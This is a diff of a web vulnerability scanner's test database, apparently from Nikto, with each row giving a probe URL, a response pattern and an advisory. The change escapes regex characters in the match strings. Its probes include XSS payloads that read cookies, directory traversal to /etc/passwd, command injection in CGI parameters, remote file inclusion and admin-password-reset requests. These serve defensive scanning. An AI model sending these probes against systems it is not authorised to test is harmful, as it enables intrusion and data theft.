"001088","607","a","/interscan/cgi-bin/FtpSave.dll?I'm%20Here","GET","These settings have been saved","","","","","Multiple files in the Interscan management server allow attackers to change settings without auth. Upgrade to the latest version of the Interscan product.","","" 1110 "001089","8610","7a","/ext.ini.%00.txt","GET"," [SERVICES]","","","","","BadBlue allows access restrictions to be bypassed by using a null byte.","",""1110 "001089","8610","7a","/ext.ini.%00.txt","GET","\[SERVICES\]","","","","","BadBlue allows access restrictions to be bypassed by using a null byte.","","" 1111 1111 "001090","0","8a","@CGIDIRSwebdriver","GET","200","","","","","This CGI often allows anyone to access the Informix DB on the host.","","" 1112 1112 "001091","5178","8a","/dostuff.php?action=modify_user","GET","200","","","","","Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/","","" … … 1135 1135 "001115","0","13","/structure.sql","GET","200","","","","","Database SQL?","","" 1136 1136 "001116","0","2","/servlet/SessionManager","GET","200","Error Occurred","","","","IBM WebSphere reconfigure servlet (user=servlet, password=manager). All default code should be removed from servers.","","" 1137 "001117","0","23","/php.ini","GET"," [PHP]","","","","","This file should not be available through the web interface.","",""1137 "001117","0","23","/php.ini","GET","\[PHP\]","","","","","This file should not be available through the web interface.","","" 1138 1138 "001118","0","2a","/SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator","GET","Event Log","","","","","SiteScope service has no password set. Restrict by IP and set a password.","","" 1139 1139 "001119","0","3","/ip.txt","GET","200","","","","","This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file.","","" … … 1143 1143 "001123","0","3","/LiveHelp/","GET","200","","","","","LiveHelp may reveal system information.","","" 1144 1144 "001124","59536","3","/logicworks.ini","GET","200","","","","","web-erp 0.1.4 and earlier allow .ini files to be read remotely.","","" 1145 "001125","0","3","/login.jsp","GET","replace (\"https:\/\/10","","","","","HP Insight Manager reveals internal IP addresses in the HTML page.","",""1145 "001125","0","3","/login.jsp","GET","replace\(\"https:\\\/\\\/10","","","","","HP Insight Manager reveals internal IP addresses in the HTML page.","","" 1146 1146 "001126","0","3","/logins.html","GET","Below are the usernames and passwords","","","","","The Divine/OpenMarket Content Server lists the default user names and passwords set up with the server.","","" 1147 1147 "001127","0","3","/logs/str_err.log","GET","200","","","","","Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries).","","" … … 1197 1197 "001178","3126","a","/submit?setoption=q&option=allowed_ips&value=255.255.255.255","GET","200","","","","","MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.","","" 1198 1198 "001179","2225","a","/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin","GET","200","","","","","paBox 1.6 may allow remote users to set the admin password. If successful, the 'admin' password is now 'admin'.","","" 1199 "001180","817","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server .javawebserver.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","",""1199 "001180","817","ab","/servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&","GET","server\.javawebserver\.serviceAdmin","","","","","The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed.","","" 1200 1200 "001181","3092","b","/shopadmin.asp","GET","200","","","","","VP-ASP shopping cart admin may be available via the web. Default ID/PW are vpasp/vpasp and admin/admin.","","" 1201 1201 "001182","3848","c","/modsecurity.php?inc_prefix=@RFIURL","GET","PHP Version","","","","","This phpWebSite script may allow inclusion of remote scripts by adding ?inc_prefix=http://YOURHOST/","","" 1202 1202 "001183","4268","c","/phpBB2/includes/db.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running.","","" 1203 "001184","6662","4","/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1204 "001185","28260","3","/_vti_bin/shtml.exe/junk_nonexistant.exe","GET",":\\ ","","","Unknown CONTENT_TYPE","","This exe shows the full web path when a non-existent file is requested.","",""1203 "001184","6662","4","/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1204 "001185","28260","3","/_vti_bin/shtml.exe/junk_nonexistant.exe","GET",":\\\\","","","Unknown CONTENT_TYPE","","This exe shows the full web path when a non-existent file is requested.","","" 1205 1205 "001186","3092","1b","/_vti_txt/_vti_cnf/","GET","200","","","","","FrontPage directory found.","","" 1206 1206 "001187","3092","1b","/_vti_txt/","GET","200","","","","","FrontPage directory found.","","" … … 1225 1225 "001206","3233","b","/admin/","GET","Tomcat's administration web application","","","","","Tomcat is installed, however the administration package does not appear to be.","","" 1226 1226 "001207","3092","b","/isx.html","GET","InfraStruXure Manager","","","","","APC InfraStruXure Manager management page found. Content may reveal software version.","","" 1227 "001208","5544","7","///","GET","Acme .Serve v1.7","","","","","Acme.Serve allows arbitrary file retrieval","",""1227 "001208","5544","7","///","GET","Acme\.Serve v1\.7","","","","","Acme.Serve allows arbitrary file retrieval","","" 1228 1228 "001209","3233","3","@CGIDIRSblog/mt-check.cgi","GET","Current working directory","","","","","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.","","" 1229 "001210","9239","4","/mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;","GET","<script>alert ('Vulnerable')</script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1230 "001211","16207","4","/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com","GET","<script>alert ('Vulnerable')</script>","","","","","IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1229 "001210","9239","4","/mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1230 "001211","16207","4","/mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1231 1231 "001212","3233","b","/mailman/listinfo","GET","mailing list","","","","","Mailman was found on the server.","","" 1232 1232 "001213","48","3","/doc/","GET","200","","","","","The /doc/ directory is browsable. This may be /usr/doc.","","" … … 1239 1239 "001221","250","a","/cgis/wwwboard/wwwboard.cgi","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","","" 1240 1240 "001222","250","a","/cgis/wwwboard/wwwboard.pl","GET","200","","","","","Versions 2.0 Alpha and below have multiple problems. See BID-1795 which could allow over-write of messages. Default ID 'WebAdmin' with pass 'WebBoard'.","","" 1241 "001223","25499","4","/affich.php?image=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GPhotos index.php rep Variable XSS.","",""1242 "001224","25498","4","/diapo.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GPhotos index.php rep Variable XSS.","",""1243 "001225","25497","4","/index.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","GPhotos index.php rep Variable XSS.","",""1241 "001223","25499","4","/affich.php?image=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" 1242 "001224","25498","4","/diapo.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" 1243 "001225","25497","4","/index.php?rep=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GPhotos index.php rep Variable XSS.","","" 1244 1244 "001226","376","7","/admin/contextAdmin/contextAdmin.html","GET","200","","","","","Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.","","" 1245 "001227","700","4","/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1246 "001228","3954", 4"","/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1247 "001229","700","4","/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1248 "001230","3954","4","/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1249 "001231","568","3","/blahb.ida","GET","200","","","file blahb .ida could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","",""1250 "001232","568","3","/blahb.idq","GET","200","","","file blahb .idq could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","",""1245 "001227","700","4","/fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1246 "001228","3954","4","/fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1247 "001229","700","4","/fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1248 "001230","3954","4","/fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1249 "001231","568","3","/blahb.ida","GET","200","","","file blahb\.ida could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","","" 1250 "001232","568","3","/blahb.idq","GET","200","","","file blahb\.idq could not","","Reveals physical path. To fix: Preferences -> Home directory -> Application & check 'Check if file exists' for the ISAPI mappings. MS01-033.","","" 1251 1251 "001233","19957","a","/ab2/\@AdminViewError","GET","200","","","","","Sun Answerbook allows viewing of the error logs without authentication.","","" 1252 "001236","16014","4","/\"><img%20src=\"javascript:alert(document.domain)\">","GET","<img src=\"javascript:alert (document.domain)\">","","","","","The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1252 "001236","16014","4","/\"><img%20src=\"javascript:alert(document.domain)\">","GET","<img src=\"javascript:alert\(document\.domain\)\">","","","","","The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1253 1253 "001237","3233","3","/Survey/Survey.Htm","GET","System Components","","","","","This Compaq device, without authentication, gives lots of system information.","","" 1254 1254 "001238","3233","3","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","GET","General Information","","","","","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL","","" 1255 1255 "001239","8679","a","/ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar","GET","200","","","","","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'.","","" 1256 "001240","14633","4","/ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> ","GET","<script>alert (Vulnerable)</script>","","","","","Sun Answerbook is vulnerable to XSS in the search field.","",""1257 "001241","19947","4","/apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1256 "001240","14633","4","/ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> ","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Sun Answerbook is vulnerable to XSS in the search field.","","" 1257 "001241","19947","4","/apps/web/index.fcgi?servers=§ion=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1258 1258 "001242","3233","23","dba4.nsf","GET","DB Analysis","","","","","This Lotus Domino page contains database views that disclose sensitive information.","","" 1259 1259 "001243","2117","b","/BACLIENT","GET","200","","","","","IBM Tivoli default file found.","","" … … 1388 1388 "001375","4806","3","/support/messages","GET","200","","","","","Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html","","" 1389 1389 "001376","3093","8","@CGIDIRSwhere.pl?sd=ls%20/etc","GET","passwd","","","","","This might be interesting... has been seen in web logs from an unknown scanner.","","" 1390 "001377","3268","23","@CGIDIRS","GET"," Index of ","","","","","Directory indexing found.","",""1391 "001378","12606","4","/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1392 "001379","12607","4","/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1393 "001380","12606","4","/bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1394 "001381","12607","4","/bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1395 "001382","12606","4","/eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1396 "001383","12607","4","/eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","",""1390 "001377","3268","23","@CGIDIRS","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","","" 1391 "001378","12606","4","/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1392 "001379","12607","4","/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1393 "001380","12606","4","/bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1394 "001381","12607","4","/bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1395 "001382","12606","4","/eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1396 "001383","12607","4","/eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","MySQL Eventum is vulnerable to XSS in the email field.","","" 1397 1397 "001384","12184","3","/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000","GET","phpinfo","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" 1398 1398 "001385","12184","3","/some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42","GET","200","","","","","PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.","","" … … 1418 1418 "001405","228","0","/upload.cgi+","GET","200","","","","","The upload.cgi allows attackers to upload arbitrary files to the server.","","" 1419 1419 "001406","561","3","/server-status","GET","200","Server Version","","","","This reveals Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","","" 1420 "001407","119","3","/?PageServices","GET"," Index of ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","",""1421 "001408","119","3","/?wp-cs-dump","GET"," Index of ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","",""1422 "001409","1193","3","/cfdocs.map","GET"," .tmp","","","","","Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information. CVE-2000-0057.","",""1420 "001407","119","3","/?PageServices","GET","[Ii]ndex [Oo]f ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","","" 1421 "001408","119","3","/?wp-cs-dump","GET","[Ii]ndex [Oo]f ","","","","","The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.","","" 1422 "001409","1193","3","/cfdocs.map","GET","\.tmp","","","","","Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information. CVE-2000-0057.","","" 1423 1423 "001410","1264","b","/publisher/","GET","200","","","","","Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. CVE-2000-0237.","","" 1424 1424 "001411","127","8","@CGIDIRSnph-publish.cgi","GET","200","","","","","This CGI may allow attackers to execute arbitrary commands on the server.","","" … … 1450 1450 "001437","2117","2","/","GET","body text=\"#000000\" bgcolor=\"#000000\" style=","","","","","Appears to be a default Domino 6 install.","","" 1451 1451 "001438","2117","2","/","GET","Domino 5","","","","","Default Lotus Domino server running.","","" 1452 "001439","2117","2","/","GET","<TITLE>Sambar Server< /TITLE>","","","","","Appears to be a default Sambar install.","",""1453 "001441","2117","2","/","GET"," (?:default Tomcat|instead of the website)","","","","","Appears to be a default Apache install.","",""1452 "001439","2117","2","/","GET","<TITLE>Sambar Server<\/TITLE>","","","","","Appears to be a default Sambar install.","","" 1453 "001441","2117","2","/","GET","\(\?:default Tomcat\|instead of the website\)","","","","","Appears to be a default Apache install.","","" 1454 1454 "001442","2117","2","/","GET","Test Page for Apache","","","","","Appears to be a default Apache install.","","" 1455 1455 "001443","2117","2","/","GET","The site you were trying to reach does not currently have a default page","","","","","Appears to be a default IIS install.","","" 1456 "001444","2117","2","/","GET","Welcome to IIS 4 .0","","","","","Appears to be a default IIS 4.0 install.","",""1456 "001444","2117","2","/","GET","Welcome to IIS 4\.0","","","","","Appears to be a default IIS 4.0 install.","","" 1457 1457 "001445","2117","2","/","GET","Welcome to Microsoft Windows NT 4","","","","","Appears to be a default IIS install.","","" 1458 "001446","2117","2","/","GET","Web Server, Enterprise Edition 6 .0","","","","","Appears to be a default Netscape/iPlanet 6 install.","",""1459 "001447","2117","b","/main_page.php","GET","mazu .css","","","","","Mazu Networks Profiler or Sensor is running.","",""1458 "001446","2117","2","/","GET","Web Server, Enterprise Edition 6\.0","","","","","Appears to be a default Netscape/iPlanet 6 install.","","" 1459 "001447","2117","b","/main_page.php","GET","mazu\.css","","","","","Mazu Networks Profiler or Sensor is running.","","" 1460 1460 "001448","2117","b","/","GET","samba is configured to deny","","","","","Samba-swat web server. Used to administer Samba.","","" 1461 1461 "001449","2117","b","/cpanel/","GET","200","","","","","Web-based control panel","","" … … 1463 1463 "001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","","" 1464 1464 "001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CVE-1999-1376. BID-2252.","","" 1465 "001453","2390","4","/forum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""1466 "001454","2390","4","/zorum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","",""1465 "001453","2390","4","/forum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" 1466 "001454","2390","4","/zorum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" 1467 1467 "001455","250","2","/wwwboard/passwd.txt","GET","200","","","","","The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.","","" 1468 "001456","2562","4","/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1469 "001457","2562","4","/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1470 "001458","2562","4","/SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1471 "001459","2562","4","/SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1472 "001460","2617","4","/acart2_0/signin.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert (\"test\")</script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","",""1468 "001456","2562","4","/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1469 "001457","2562","4","/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1470 "001458","2562","4","/SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1471 "001459","2562","4","/SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1472 "001460","2617","4","/acart2_0/signin.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" 1473 1473 "001461","264","3","/ows-bin/perlidlc.bat?&dir","GET","ows-bin:","","","","","The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html","","" 1474 1474 "001462","2695","b","/photo/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","","" … … 1476 1476 "001464","2695","b","@CGIDIRSphoto/","GET","200","","","","","My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.","","" 1477 1477 "001465","271","2","/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits full highlighting","","","","","All default files should be removed.","","" 1478 "001466","271","2","/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits summary highlighting .","","","","","All default files should be removed.","",""1479 "001467","271","5","/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full","GET"," <html>","","","","","It is possible to retrieve the source of .asp files or view any file on the system. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp. MS00-006, CVE-2000-0097.","",""1480 "001468","271","5","/","GET","null .htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full","","","","","It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp","",""1478 "001466","271","2","/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full","GET","This is the formatting page for webhits summary highlighting\.","","","","","All default files should be removed.","","" 1479 "001467","271","5","/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full","GET","\<html\>","","","","","It is possible to retrieve the source of .asp files or view any file on the system. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp. MS00-006, CVE-2000-0097.","","" 1480 "001468","271","5","/","GET","null\.htw\?CiWebHitsFile=\/default\.asp\%20\&CiRestriction=none\&CiHiliteType=Full","","","","","It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp","","" 1481 1481 "001469","2713","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini","GET","boot loader","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.","","" 1482 1482 "001470","2713","4","/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd","GET","root:","","","","","The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.","","" … … 1488 1488 "001476","2721","7","../../../../../../../../../../etc/passw*","GET","root:","","","","","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897","","" 1489 1489 "001477","2722","7","/bytehoard/index.php?infolder=../../../../../../../../../../../etc/","GET","passwd","","","","","ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.","","" 1490 "001478","2723","3","/Search","GET"," index of ","","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","",""1490 "001478","2723","3","/Search","GET","[Ii]ndex [Oo]f ","","","","","FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.","","" 1491 1491 "001479","2735","d","/musicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","","" 1492 1492 "001480","2735","d","@CGIDIRSmusicqueue.cgi","GET","200","","","","","Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/","","" … … 1497 1497 "001485","279","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%","GET","boot loader","","","","","WINDMAIL.EXE can read arbitrary files","","" 1498 1498 "001486","279","7","@CGIDIRSWINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\","GET","200","","","","","WINDMAIL.EXE can read arbitrary files","","" 1499 "001487","2790","4","/index.php?vo=\"><script>alert(document.cookie);</script>","GET","><script>alert (document.cookie);</script>","","","","","Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""1499 "001487","2790","4","/index.php?vo=\"><script>alert(document.cookie);</script>","GET","><script>alert\(document\.cookie\);<\/script>","","","","","Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 1500 1500 